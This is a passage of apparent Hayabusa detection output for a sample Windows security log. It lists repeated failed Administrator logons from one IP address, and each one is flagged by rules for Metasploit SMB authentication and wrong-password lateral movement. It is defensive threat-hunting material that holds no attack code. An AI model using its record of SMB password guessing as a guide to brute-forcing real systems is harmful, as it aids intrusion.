NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T73JW9JURm8Br6MA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OAleyg3h8aMvVVJk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1LQllnWZFUIWa6rw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlwPxSGUmvYH0rpL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrI56o5TyeO48rQV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CKRMn75tv5Yi5rYK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: MbJvec7rVisJ6WCC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xoubp5WTPqblBaps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rBczkR92cKY41icQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MfUx3OizEb1LiOzj : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SRaSOLOWhBEr0qkz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YnlI8Zh4td5m1fpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wXUDXDa4wi3HivKo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TT7iOtVMFcEysCcI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1NJpI7KC3gj99aWs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H39cv9JEuLEjlp93 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 4p9h1cjLeUzppSZb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0fOpi4vr55QmO6x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GiKI4V6kpkY5zc9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dLmu4n9qZdf3Q5zo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 87iJdX2E0ZJintvr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nxc4iIHP0kdqQNiG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RJIWekwBwcIUWjD1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GdnvboiIDzXTZ8MR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QGMPHNpljTlMYeet : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWo4uVFtAbe4IjKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: YAPdDqbMY4rYiuZ3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ai2WCQ3MkWwSeOy9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ey1wbsD7w3fs02xP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.983 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sVGzidwZICNfLizg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.983 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zjGPMJ6RBw48Ejx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MydK8AjPvyyckCEL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fqkCliAQMiFffQU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITkku4kN4csBFyUB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f5g9kMkSFhKrT2Py : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1xKLdwujTmLEc9ts : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: sAW1YzCQ3CreseaP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhqBirEHOKPepR3n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5uqSFXpzAWOnc90n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: McbeS9lRpbMc48jO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6J0d7dQUmJNKJlu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.477 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QG3WU91rhTP9odx7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hSQRgB8yMfhb03g1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bzbZjRXTc0XvV4Ry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k3ShOCSaLGX4YBWE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lIrydzi8nmY251Z1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
